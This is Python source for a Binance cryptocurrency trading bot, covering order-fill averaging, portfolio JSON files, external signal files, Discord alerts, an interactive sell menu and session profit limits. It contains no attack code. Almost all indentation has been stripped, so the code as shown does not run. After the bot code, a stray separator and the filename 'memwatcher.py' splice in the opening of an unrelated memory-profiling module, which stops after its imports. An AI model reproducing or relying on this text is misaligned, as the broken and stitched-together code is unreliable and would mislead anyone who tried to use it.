#extracted from the code of OlorinSledge
def sell_coin(coin):
global sell_specific_coin
#print(f'{str(datetime.now())} | SELL SPECIFIC COIN: {coin}')
msg_discord(f'{str(datetime.now())} | SELL SPECIFIC COIN: {coin}')
# sell all coins NOW!
sell_specific_coin = True
coins_sold = sell_coins(False, coin)
remove_from_portfolio(coins_sold)
sell_specific_coin = False
def sell_external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.sell")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
if DEBUG: print(f'{symbol} added to sell_external_signals() list')
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Could not remove external SELL signalling file{txcolors.DEFAULT}')
return external_list
def extract_order_data(order_details):
global TRADING_FEE, STOP_LOSS, TAKE_PROFIT
transactionInfo = {}
# This code is from GoranJovic - thank you!
#
# adding order fill extractions here
#
# just to explain what I am doing here:
# Market orders are not always filled at one price, we need to find the averages of all 'parts' (fills) of this order.
#
# reset other variables to 0 before use
FILLS_TOTAL = 0
FILLS_QTY = 0
FILLS_FEE = 0
BNB_WARNING = 0
# loop through each 'fill':
for fills in order_details['fills']:
FILL_PRICE = float(fills['price'])
FILL_QTY = float(fills['qty'])
FILLS_FEE += float(fills['commission'])
# check if the fee was in BNB. If not, log a nice warning:
if (fills['commissionAsset'] != 'BNB') and (TRADING_FEE == 0.075) and (BNB_WARNING == 0):
if not SCREEN_MODE == 2: print(f"WARNING: BNB not used for trading fee, please ")
BNB_WARNING += 1
# quantity of fills * price
FILLS_TOTAL += (FILL_PRICE * FILL_QTY)
# add to running total of fills quantity
FILLS_QTY += FILL_QTY
# increase fills array index by 1
# calculate average fill price:
FILL_AVG = (FILLS_TOTAL / FILLS_QTY)
#tradeFeeApprox = (float(FILLS_QTY) * float(FILL_AVG)) * (TRADING_FEE/100)
# Olorin Sledge: I only want fee at the unit level, not the total level
tradeFeeApprox = float(FILL_AVG) * (TRADING_FEE/100)
# the volume size is sometimes outside of precision, correct it
try:
info = client.get_symbol_info(order_details['symbol'])
step_size = info['filters'][2]['stepSize']
lot_size = step_size.index('1') - 1
if lot_size <= 0:
FILLS_QTY = int(FILLS_QTY)
else:
FILLS_QTY = truncate(FILLS_QTY, lot_size)
except Exception as e:
if not SCREEN_MODE == 2: print(f"extract_order_data(): Exception getting coin {order_details['symbol']} step size! Exception: {e}")
# create object with received data from Binance
transactionInfo = {
'symbol': order_details['symbol'],
'orderId': order_details['orderId'],
'timestamp': order_details['transactTime'],
'avgPrice': float(FILL_AVG),
'volume': float(FILLS_QTY),
'tradeFeeBNB': float(FILLS_FEE),
'tradeFeeUnit': tradeFeeApprox,
}
return transactionInfo
def check_total_session_profit(coins_bought, last_price):
global is_bot_running, session_tpsl_override_msg
unrealised_session_profit_incfees_total = 0
BUDGET = TRADE_SLOTS * TRADE_TOTAL
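# add the unrealised, fee-inclusive P/L of all open positions to the realised session profit and compare the total against the session TP/SL overrides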
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
#PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
PriceChangeIncFees_Total = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_Total)
allsession_profits_perc = session_profit_incfees_perc + ((unrealised_session_profit_incfees_total / BUDGET) * 100)
if DEBUG: print(f'Session Override SL Feature: ASPP={allsession_profits_perc} STP {SESSION_TAKE_PROFIT} SSL {SESSION_STOP_LOSS}')
if allsession_profits_perc >= float(SESSION_TAKE_PROFIT):
session_tpsl_override_msg = "Session TP Override target of " + str(SESSION_TAKE_PROFIT) + "% met. Sell all coins now!"
is_bot_running = False
if allsession_profits_perc <= float(SESSION_STOP_LOSS):
session_tpsl_override_msg = "Session SL Override target of " + str(SESSION_STOP_LOSS) + "% met. Sell all coins now!"
is_bot_running = False
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
# print(orders)
for coin in orders:
try:
coin_step_size = float(next(
filter(lambda f: f['filterType'] == 'LOT_SIZE', client.get_symbol_info(coin)['filters'])
)['stepSize'])
except Exception as ExStepSize:
coin_step_size = .1
if not TEST_MODE:
coins_bought[coin] = {
'symbol': orders[coin]['symbol'],
'orderid': orders[coin]['orderId'],
'timestamp': orders[coin]['timestamp'],
'bought_at': orders[coin]['avgPrice'],
'volume': orders[coin]['volume'],
'volume_debug': volume[coin],
'buyFeeBNB': orders[coin]['tradeFeeBNB'],
'buyFee': orders[coin]['tradeFeeUnit'] * orders[coin]['volume'],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
'step_size': float(coin_step_size),
}
if not SCREEN_MODE == 2: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Order for {orders[coin]["symbol"]} with ID {orders[coin]["orderId"]} placed and saved to file.')
else:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
'step_size': float(coin_step_size),
}
if not SCREEN_MODE == 2: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Order for {orders[coin][0]["symbol"]} with ID {orders[coin][0]["orderId"]} placed and saved to file.')
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def update_bot_stats():
global trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total, session_USDT_EARNED, USED_BNB_IN_SESSION
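# persist the session statistics to a JSON file so a later run can resume the same session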
bot_stats = {
'total_capital' : str(TRADE_SLOTS * TRADE_TOTAL),
'botstart_datetime' : str(bot_started_datetime),
'historicProfitIncFees_Percent': historic_profit_incfees_perc,
'historicProfitIncFees_Total': format(historic_profit_incfees_total, ".14f"),
'tradeWins': trade_wins,
'tradeLosses': trade_losses,
'session_'+ PAIR_WITH + '_EARNED': format(session_USDT_EARNED, ".14f"),
'used_bnb_in_session': USED_BNB_IN_SESSION,
}
#save session info for through session portability
with open(bot_stats_file_path, 'w') as file:
json.dump(bot_stats, file, indent=4)
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
# code below created by getsec <3
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
if os.path.exists('signalsell_tickers.txt'):
os.remove('signalsell_tickers.txt')
for coin in coins_bought:
write_signallsell(coin.removesuffix(PAIR_WITH))
def write_signallsell(symbol):
with open('signalsell_tickers.txt','a+') as f:
f.write(f'{symbol}\n')
def remove_external_signals(fileext):
signals = glob.glob(f'signals/*.{fileext}')
for filename in signals:
try:
os.remove(filename)
except:
if DEBUG: write_log(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
def load_signal_threads():
# load signalling modules
global signalthreads
signalthreads = []
try:
if SIGNALLING_MODULES is not None:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
# t = threading.Thread(target=mymodule[module].do_work, args=())
t = multiprocessing.Process(target=mymodule[module].do_work, args=())
t.name = module
t.daemon = True
t.start()
# add process to a list. This is so the thread can be terminated at a later time
signalthreads.append(t)
time.sleep(2)
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}No modules to load {SIGNALLING_MODULES}')
except Exception as e:
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} load_signal_threads: Loading external signals exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
def stop_signal_threads():
global signalthreads
try:
for signalthread in signalthreads:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Terminating thread {str(signalthread.name)}')
signalthread.terminate()
except Exception as e:
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}{"stop_signal_threads"}: Exception in function: {e}')
pass
except KeyboardInterrupt as ki:
pass
def truncate(number, decimals=0):
"""
Returns a value truncated to a specific number of decimal places.
Better than rounding
"""
if not isinstance(decimals, int):
raise TypeError("decimal places must be an integer.")
elif decimals < 0:
raise ValueError("decimal places has to be 0 or more.")
elif decimals == 0:
return math.trunc(number)
factor = 10.0 ** decimals
return math.trunc(number * factor) / factor
def load_settings():
# set to false at Start
global bot_paused, parsed_config, creds_file, access_key, secret_key, parsed_creds
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
global DEBUG, TEST_MODE, LOG_TRADES, TRADES_LOG_FILE, DEBUG_SETTING, AMERICAN_USER, PAIR_WITH, QUANTITY, MAX_COINS, FIATS, TIME_DIFFERENCE, RECHECK_INTERVAL, CHANGE_IN_PRICE, STOP_LOSS, TAKE_PROFIT, CUSTOM_LIST, TICKERS_LIST, USE_TRAILING_STOP_LOSS, TRAILING_STOP_LOSS, TRAILING_TAKE_PROFIT, TRADING_FEE, SIGNALLING_MODULES, SCREEN_MODE, MSG_DISCORD, HISTORY_LOG_FILE, TRADE_SLOTS, TRADE_TOTAL, SESSION_TPSL_OVERRIDE, SESSION_TAKE_PROFIT, SESSION_STOP_LOSS, SELL_ON_SIGNAL_ONLY, SHOW_INITIAL_CONFIG, USE_MOST_VOLUME_COINS, COINS_MAX_VOLUME, COINS_MIN_VOLUME, DISABLE_TIMESTAMPS, STATIC_MAIN_INFO, COINS_BOUGHT, BOT_STATS, MAIN_FILES_PATH, PRINT_TO_FILE, ENABLE_PRINT_TO_FILE, EX_PAIRS, RESTART_MODULES, SHOW_TABLE_COINS_BOUGHT, ALWAYS_OVERWRITE, SORT_TABLE_BY, REVERSE_SORT, MAX_HOLDING_TIME, IGNORE_FEE, EXTERNAL_COINS, PROXY_HTTP, PROXY_HTTPS, REINVEST_MODE, LOG_FILE, sell_all_coins, sell_specific_coin
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
#REINVEST_MODE = parsed_config['script_options']['REINVEST_MODE']
# LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
MAIN_FILES_PATH = parsed_config['script_options'].get('MAIN_FILES_PATH')
TRADES_LOG_FILE = parsed_config['script_options'].get('TRADES_LOG_FILE')
HISTORY_LOG_FILE = parsed_config['script_options'].get('HISTORY_LOG_FILE')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
#HISTORY_LOG_FILE = "history.html"
COINS_BOUGHT = parsed_config['script_options'].get('COINS_BOUGHT')
BOT_STATS = parsed_config['script_options'].get('BOT_STATS')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
EXTERNAL_COINS = parsed_config['script_options']['EXTERNAL_COINS']
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
TRADE_TOTAL = parsed_config['trading_options']['TRADE_TOTAL']
TRADE_SLOTS = parsed_config['trading_options']['TRADE_SLOTS']
#FIATS = parsed_config['trading_options']['FIATS']
EX_PAIRS = parsed_config['trading_options']['EX_PAIRS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
#COOLOFF_PERIOD = parsed_config['trading_options']['COOLOFF_PERIOD']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
# Code modified from DJCommie fork
# Load Session OVERRIDE values - used to STOP the bot when current session meets a certain STP or SSL value
SESSION_TPSL_OVERRIDE = parsed_config['trading_options']['SESSION_TPSL_OVERRIDE']
SESSION_TAKE_PROFIT = parsed_config['trading_options']['SESSION_TAKE_PROFIT']
SESSION_STOP_LOSS = parsed_config['trading_options']['SESSION_STOP_LOSS']
# Borrowed from DJCommie fork
# If TRUE, coin will only sell based on an external SELL signal
SELL_ON_SIGNAL_ONLY = parsed_config['trading_options']['SELL_ON_SIGNAL_ONLY']
# Discord integration
# Used to push alerts, messages etc to a discord channel
MSG_DISCORD = parsed_config['trading_options']['MSG_DISCORD']
sell_all_coins = False
sell_specific_coin = False
# Functionality to "reset / restart" external signal modules(code os OlorinSledge)
RESTART_MODULES = parsed_config['trading_options']['RESTART_MODULES']
#minimal mode
SCREEN_MODE = parsed_config['trading_options']['SCREEN_MODE']
STATIC_MAIN_INFO = parsed_config['trading_options']['STATIC_MAIN_INFO']
DISABLE_TIMESTAMPS = parsed_config['trading_options']['DISABLE_TIMESTAMPS']
#PRINT_TO_FILE = parsed_config['trading_options']['PRINT_TO_FILE']
#ENABLE_PRINT_TO_FILE = parsed_config['trading_options']['ENABLE_PRINT_TO_FILE']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
SHOW_INITIAL_CONFIG = parsed_config['trading_options']['SHOW_INITIAL_CONFIG']
SHOW_TABLE_COINS_BOUGHT = parsed_config['trading_options']['SHOW_TABLE_COINS_BOUGHT']
USE_MOST_VOLUME_COINS = parsed_config['trading_options']['USE_MOST_VOLUME_COINS']
COINS_MAX_VOLUME = parsed_config['trading_options']['COINS_MAX_VOLUME']
COINS_MIN_VOLUME = parsed_config['trading_options']['COINS_MIN_VOLUME']
ALWAYS_OVERWRITE = parsed_config['trading_options']['ALWAYS_OVERWRITE']
SORT_TABLE_BY = parsed_config['trading_options']['SORT_TABLE_BY']
REVERSE_SORT = parsed_config['trading_options']['REVERSE_SORT']
MAX_HOLDING_TIME = parsed_config['trading_options']['MAX_HOLDING_TIME']
IGNORE_FEE = parsed_config['trading_options']['IGNORE_FEE']
PROXY_HTTP = parsed_config['script_options']['PROXY_HTTP']
PROXY_HTTPS = parsed_config['script_options']['PROXY_HTTPS']
#BNB_FEE = parsed_config['trading_options']['BNB_FEE']
#TRADING_OTHER_FEE = parsed_config['trading_options']['TRADING_OTHER_FEE']
if DEBUG_SETTING or args.debug:
DEBUG = True
access_key, secret_key = load_correct_creds(parsed_creds)
def renew_list():
global tickers, VOLATILE_VOLUME_LIST, FLAG_PAUSE, COINS_MAX_VOLUME, COINS_MIN_VOLUME
try:
if USE_MOST_VOLUME_COINS == True:
if VOLATILE_VOLUME_LIST == "volatile_volume_" + str(date.today()) + ".txt" and os.path.exists(VOLATILE_VOLUME_LIST) == True:
tickers=[line.strip() for line in open(VOLATILE_VOLUME_LIST)]
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}A new Volatility Volume list will be created...')
stop_signal_threads()
FLAG_PAUSE = True
if TEST_MODE == True:
jsonfile = "test_" + COINS_BOUGHT
else:
jsonfile = "live_" + COINS_BOUGHT
with open(jsonfile,'r') as f:
coins_bought_list = json.load(f)
coinstosave = []
for coin in coins_bought_list:
coinstosave.append(coin.replace(PAIR_WITH,"") + "\n")
VOLATILE_VOLUME_LIST = get_volume_list()
with open(VOLATILE_VOLUME_LIST,'r') as f:
lines = f.readlines()
for c in coinstosave:
    for l in lines:
        if c == l:
            break
    else:
        # coin is still held but missing from the new list, so keep tracking it
        lines.append(c)
with open(VOLATILE_VOLUME_LIST,'w') as f:
f.writelines(lines)
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}A new Volatility Volume list has been created...')
FLAG_PAUSE = False
#renew_list()
load_signal_threads()
else:
tickers=[line.strip() for line in open(TICKERS_LIST)]
except Exception as e:
write_log(f'{"renew_list"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
def new_or_continue():
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
if os.path.exists(file_prefix + str(COINS_BOUGHT)) or os.path.exists(file_prefix + str(BOT_STATS)):
LOOP = True
END = False
while LOOP:
if ALWAYS_OVERWRITE == False:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Do you want to continue the previous session? [y/n]{txcolors.DEFAULT}')
x = input("#: ")
else:
x = "n"
if x == "y" or x == "n":
if x == "y":
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Continuing with the session started ...{txcolors.DEFAULT}')
LOOP = False
END = True
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Deleting previous sessions ...')
if os.path.exists(file_prefix + COINS_BOUGHT): os.remove(file_prefix + COINS_BOUGHT)
if os.path.exists(file_prefix + BOT_STATS): os.remove(file_prefix + BOT_STATS)
if os.path.exists(EXTERNAL_COINS): os.remove(EXTERNAL_COINS)
if os.path.exists(file_prefix + TRADES_LOG_FILE): os.remove(file_prefix + TRADES_LOG_FILE)
if os.path.exists(file_prefix + HISTORY_LOG_FILE): os.remove(file_prefix + HISTORY_LOG_FILE)
if os.path.exists(file_prefix + LOG_FILE): os.remove(file_prefix + LOG_FILE)
files = []
folder = "signals"
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.pause", "/*.buy","/*.sell"]] for item in sublist]
for filename in files:
if os.path.exists(filename): os.remove(filename)
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Session deleted, continuing ...')
LOOP = False
END = True
else:
print(f'Press the y key or the n key ...')
LOOP = True
return END
def menu():
try:
global COINS_MAX_VOLUME, COINS_MIN_VOLUME
global SCREEN_MODE, PAUSEBOT_MANUAL
END = False
LOOP = True
stop_signal_threads()
while LOOP:
time.sleep(5)
print(f'')
print(f'')
print(f'{txcolors.MENUOPTION}[1]{txcolors.WARNING}Reload Configuration{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[2]{txcolors.WARNING}Reload modules{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[3]{txcolors.WARNING}Reload Volatility Volume List{txcolors.DEFAULT}')
if PAUSEBOT_MANUAL == False:
print(f'{txcolors.MENUOPTION}[4]{txcolors.WARNING}Stop Purchases{txcolors.DEFAULT}')
else:
print(f'{txcolors.MENUOPTION}[4]{txcolors.WARNING}Start Purchases{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[5]{txcolors.WARNING}Sell Specific Coin{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[6]{txcolors.WARNING}Sell All Coins{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[7]{txcolors.WARNING}Exit BOT{txcolors.DEFAULT}')
x = input('Please enter your choice: ')
x = int(x)
print(f'')
print(f'')
if x == 1:
load_settings()
#print(f'TICKERS_LIST(menu): ' + TICKERS_LIST)
renew_list()
LOOP = False
load_signal_threads()
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Reload Completed{txcolors.DEFAULT}')
elif x == 2:
stop_signal_threads()
load_signal_threads()
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Modules Reload Completed{txcolors.DEFAULT}')
LOOP = False
elif x == 3:
stop_signal_threads()
#load_signal_threads()
global VOLATILE_VOLUME_LIST
if USE_MOST_VOLUME_COINS == True:
os.remove(VOLATILE_VOLUME_LIST)
VOLATILE_VOLUME_LIST = get_volume_list()
renew_list()
else:
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}USE_MOST_VOLUME_COINS must be true in config.yml{txcolors.DEFAULT}')
LOOP = False
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}VOLATILE_VOLUME_LIST Reload Completed{txcolors.DEFAULT}')
load_signal_threads()
LOOP = False
elif x == 4:
if PAUSEBOT_MANUAL == False:
PAUSEBOT_MANUAL = True
LOOP = False
else:
PAUSEBOT_MANUAL = False
LOOP = False
elif x == 5:
# partly extracted from the code of OlorinSledge
stop_signal_threads()
while not x == "n":
last_price = get_price()
print_table_coins_bought()
print(f'{txcolors.WARNING}\nType in the Symbol you wish to sell. [n] to continue BOT.{txcolors.DEFAULT}')
x = input("#: ")
if x == "":
break
sell_coin(x.upper() + PAIR_WITH)
load_signal_threads()
LOOP = False
elif x == 6:
stop_signal_threads()
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Do you want to sell all coins?[y/n]{txcolors.DEFAULT}')
sellall = input("#: ")
if sellall.upper() == "Y":
sell_all('Sell all, manual choice!')
load_signal_threads()
LOOP = False
elif x == 7:
# stop external signal threads
stop_signal_threads()
# ask user if they want to sell all coins
#print(f'\n\n\n')
#print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Program execution ended by user!\n\nDo you want to sell all coins?[y/n]{txcolors.DEFAULT}')
#sellall = input("#: ")
#if sellall.upper() == "Y":
# sell all coins
#sell_all('Program execution ended by user!')
#END = True
#LOOP = False
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Program execution ended by user!')
sys.exit(0)
#else:
#END = True
#LOOP = False
else:
print(f'wrong choice')
LOOP = True
except Exception as e:
write_log(f'Exception in menu() 1: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
except KeyboardInterrupt as ki:
menu()
return END
if __name__ == '__main__':
req_version = (3,9)
if sys.version_info[:2] < req_version:
print(f'This bot requires Python version 3.9 or newer. You are running version {sys.version_info[:2]} - please upgrade your Python version!')
sys.exit()
# Load arguments then parse settings
args = parse_args()
mymodule = {}
print(f'')
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Initializing, wait a moment...')
discord_msg_balance_data = ""
last_msg_discord_balance_date = datetime.now()
last_history_log_date = datetime.now()
load_settings()
if DISABLE_TIMESTAMPS == False:
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
# Load creds for correct environment
if DEBUG:
if SHOW_INITIAL_CONFIG == True: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Loaded config below\n{json.dumps(parsed_config, indent=4)}')
if SHOW_INITIAL_CONFIG == True: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Your credentials have been loaded from {creds_file}')
if MSG_DISCORD:
    DISCORD_WEBHOOK = load_discord_creds(parsed_creds)
sell_all_coins = False
sell_specific_coin = False
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
if PROXY_HTTP != '' or PROXY_HTTPS != '':
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} Using proxy ...')
proxies = {
'http': PROXY_HTTP,
'https': PROXY_HTTPS
}
client = Client(access_key, secret_key, {'proxies': proxies}, tld='us')
else:
client = Client(access_key, secret_key, tld='us')
else:
if PROXY_HTTP != '' or PROXY_HTTPS != '':
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} Using proxy ...')
proxies = {
'http': PROXY_HTTP,
'https': PROXY_HTTPS
}
client = Client(access_key, secret_key, {'proxies': proxies})
else:
client = Client(access_key, secret_key)
# If the user has a bad / incorrect API key,
# this will stop the script from starting and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
global VOLATILE_VOLUME_LIST
if USE_MOST_VOLUME_COINS == True: VOLATILE_VOLUME_LIST = get_volume_list()
renew_list()
new_or_continue()
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
# path to the saved coins_bought file
coins_bought_file_path = file_prefix + COINS_BOUGHT
# The below mod was stolen and altered from GoGo's fork, a nice addition for keeping a historical record of profit across multiple bot sessions.
# path to the saved bot_stats file
bot_stats_file_path = file_prefix + BOT_STATS
# use separate files for testing and live trading
#TRADES_LOG_FILE = file_prefix + TRADES_LOG_FILE
#HISTORY_LOG_FILE = file_prefix + HISTORY_LOG_FILE
bot_started_datetime = datetime.now()
total_capital_config = TRADE_SLOTS * TRADE_TOTAL
if os.path.isfile(bot_stats_file_path) and os.stat(bot_stats_file_path).st_size != 0:
with open(bot_stats_file_path) as file:
bot_stats = json.load(file)
# load bot stats:
try:
bot_started_datetime = datetime.strptime(bot_stats['botstart_datetime'], '%Y-%m-%d %H:%M:%S.%f')
except Exception as e:
print (f'Exception on reading botstart_datetime from {bot_stats_file_path}. Exception: {e}')
bot_started_datetime = datetime.now()
try:
total_capital = bot_stats['total_capital']
except Exception as e:
print (f'Exception on reading total_capital from {bot_stats_file_path}. Exception: {e}')
total_capital = TRADE_SLOTS * TRADE_TOTAL
historic_profit_incfees_perc = float(bot_stats['historicProfitIncFees_Percent'])
historic_profit_incfees_total = float(bot_stats['historicProfitIncFees_Total'])
trade_wins = bot_stats['tradeWins']
trade_losses = bot_stats['tradeLosses']
session_USDT_EARNED = float(bot_stats['session_' + PAIR_WITH + '_EARNED'])
if total_capital != total_capital_config:
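# (illustrative numbers) if the saved total_capital was 600 but the config now
# gives TRADE_SLOTS * TRADE_TOTAL = 1000, the stored profit percentage is rebased
# below, e.g. historic_profit_incfees_total = 50 becomes 50 / 1000 * 100 = 5 %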
historic_profit_incfees_perc = (historic_profit_incfees_total / total_capital_config) * 100
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
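# e.g. TIME_DIFFERENCE = 5 and RECHECK_INTERVAL = 6 (illustrative values) keep a
# buffer of 5 * 6 = 30 price snapshots, with hsp_head cycling through it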
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size != 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-C to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}WARNING: Test mode is disabled in the configuration, you are using _LIVE_ funds.')
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}WARNING: Waiting 10 seconds before live trading as a security measure!')
time.sleep(10)
remove_external_signals('buy')
remove_external_signals('sell')
remove_external_signals('pause')
load_signal_threads()
# seed initial prices
get_price()
TIMEOUT_COUNT=0
READ_CONNECTERR_COUNT=0
BINANCE_API_EXCEPTION=0
# extract of code from OlorinSledge, thanks
thehour = datetime.now().hour
coins_sold = {}
while is_bot_running:
try:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
if SESSION_TPSL_OVERRIDE:
check_total_session_profit(coins_bought, last_price)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
update_bot_stats()
#coins_sold = sell_coins()
#remove_from_portfolio(coins_sold)
#update_bot_stats()
if FLAG_PAUSE == False:
# extract of code from OlorinSledge, thanks
if RESTART_MODULES and thehour != datetime.now().hour:
stop_signal_threads()
load_signal_threads()
thehour = datetime.now().hour
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Modules Reload Completed{txcolors.DEFAULT}')
except ReadTimeout as rt:
TIMEOUT_COUNT += 1
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}We got a timeout error from Binance. Re-loop. Connection Timeouts so far: {TIMEOUT_COUNT}')
except ConnectionError as ce:
READ_CONNECTERR_COUNT += 1
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}We got a connection error from Binance. Re-loop. Connection Errors so far: {READ_CONNECTERR_COUNT}')
except BinanceAPIException as bapie:
BINANCE_API_EXCEPTION += 1
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}We got an API error from Binance. Re-loop. API Errors so far: {BINANCE_API_EXCEPTION}.\nException:\n{bapie}')
except KeyboardInterrupt as ki:
if menu() == True: sys.exit(0)
try:
if not is_bot_running:
if SESSION_TPSL_OVERRIDE:
print(f'')
print(f'')
print(f'{txcolors.WARNING}{session_tpsl_override_msg}{txcolors.DEFAULT}')
sell_all(session_tpsl_override_msg, True)
sys.exit(0)
else:
print(f'')
print(f'')
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Bot terminated for some reason.')
except Exception as e:
write_log(f'Exception in main() 1: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
except KeyboardInterrupt as ki:
pass
|
memwatcher.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Profile mem usage envelope of IPython commands and report interactively"""
from __future__ import division # 1/2 == 0.5, as in Py3
from __future__ import absolute_import # avoid hiding global modules with locals
from __future__ import print_function # force use of print("hello")
from __future__ import unicode_literals # force unadorned strings "" to be unicode without prepending u""
import time
import memory_profiler
from collections import namedtuple
import threading
